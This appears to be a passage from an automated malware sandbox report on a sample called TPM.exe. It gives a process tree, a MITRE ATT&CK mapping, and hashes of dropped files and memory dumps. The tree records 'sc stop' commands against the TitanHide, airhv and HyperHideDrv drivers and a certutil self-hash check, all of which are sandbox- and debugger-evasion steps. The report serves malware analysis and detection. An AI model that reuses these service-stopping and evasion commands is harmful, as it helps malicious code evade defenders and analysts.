- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5800
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5808
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5816
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5824
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5832
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5840
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5848
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5856
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5864
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5872
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop TitanHide > nul
    3⤵
    PID:5952
  - - C:\Windows\system32\sc.exe
      sc stop TitanHide
      4⤵
      Launches sc.exe
      PID:5968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop airhv > nul
    3⤵
    PID:6072
  - - C:\Windows\system32\sc.exe
      sc stop airhv
      4⤵
      Launches sc.exe
      PID:60
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop HyperHideDrv > nul
    3⤵
    PID:4012
  - - C:\Windows\system32\sc.exe
      sc stop HyperHideDrv
      4⤵
      Launches sc.exe
      PID:3996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\TPM.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
    3⤵
    PID:3348
  - - C:\Windows\system32\certutil.exe
      certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\TPM.exe" MD5
      4⤵
      PID:2072
  - - C:\Windows\system32\find.exe
      find /i /v "md5"
      4⤵
      PID:2288
  - - C:\Windows\system32\find.exe
      find /i /v "certutil"
      4⤵
      PID:1592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop TitanHide > nul
    3⤵
    PID:1172
  - - C:\Windows\system32\sc.exe
      sc stop TitanHide
      4⤵
      Launches sc.exe
      PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop airhv > nul
    3⤵
    PID:6056
  - - C:\Windows\system32\sc.exe
      sc stop airhv
      4⤵
      Launches sc.exe
      PID:6128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop HyperHideDrv > nul
    3⤵
    PID:404
  - - C:\Windows\system32\sc.exe
      sc stop HyperHideDrv
      4⤵
      Launches sc.exe
      PID:6060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Suspicious behavior: AddClipboardFormatListener
PID:4036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:1924

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3336

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe d6065a4b62db7313dbb8d421c0e8b30b rhiMfzjVH06qYUt3vXFrag.0.1.0.0.0
1⤵
PID:1644

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p4suwj40.y3l.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aut6A72.tmp

Filesize
4.2MB

MD5
8009d43544d3fe4c26599bbcae17e03b

SHA1
ecf1ce31a4d3eb813b5f273dbd073e4f89119448

SHA256
abdb3a70dcddb612078fedefe10b3fa53ec63a89776136c5863637e35b512a1b

SHA512
66e9505197289a4719634a612056bf588af5d81edc4f83259d241d7a0951ba6ca5a4d8466e9755e870fb052df029b93391bf411cec3c8b1aff52c8c4751010ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\checklmao.bat

Filesize
1KB

MD5
65b71554b34e595a0088bf996fffddfb

SHA1
902cec988a26f29a46fc25ab54ba9537b2f08af3

SHA256
38947d774f734828c5aaf1a58d4ca187ccd36bb5390b570b65c5bf4102d074ff

SHA512
35c5983f2cf47b981343e0a4dddd6ce880c3a3d555da8c9fe02133dd99ba007b85c49ace2d2694c2cc7f1dd0e6d0a5dfce8a12e681719858f4ac621e1be04905

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
8abf2d6067c6f3191a015f84aa9b6efe

SHA1
98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

SHA256
ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

SHA512
c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
f313c5b4f95605026428425586317353

SHA1
06be66fa06e1cffc54459c38d3d258f46669d01a

SHA256
129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

SHA512
b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
ceb7caa4e9c4b8d760dbf7e9e5ca44c5

SHA1
a3879621f9493414d497ea6d70fbf17e283d5c08

SHA256
98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

SHA512
1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
1e8e2076314d54dd72e7ee09ff8a52ab

SHA1
5fd0a67671430f66237f483eef39ff599b892272

SHA256
55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

SHA512
5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
memory/1408-13-0x0000026778E60000-0x0000026778E82000-memory.dmp

Filesize
136KB

Download
memory/2684-92-0x0000017FA8400000-0x0000017FA8F94000-memory.dmp

Filesize
11.6MB

Download
memory/3680-93-0x0000029065450000-0x0000029065FE4000-memory.dmp

Filesize
11.6MB

Download
memory/4728-25-0x0000000140000000-0x0000000140B94000-memory.dmp

Filesize
11.6MB

Download
memory/4728-111-0x0000000140000000-0x0000000140B94000-memory.dmp

Filesize
11.6MB

Download
memory/4728-30-0x00007FFF85090000-0x00007FFF85285000-memory.dmp

Filesize
2.0MB

Download
memory/4728-29-0x0000000140000000-0x0000000140B94000-memory.dmp

Filesize
11.6MB

Download
memory/4728-27-0x0000000140000000-0x0000000140B94000-memory.dmp

Filesize
11.6MB

Download
memory/4728-28-0x0000000140000000-0x0000000140B94000-memory.dmp

Filesize
11.6MB

Download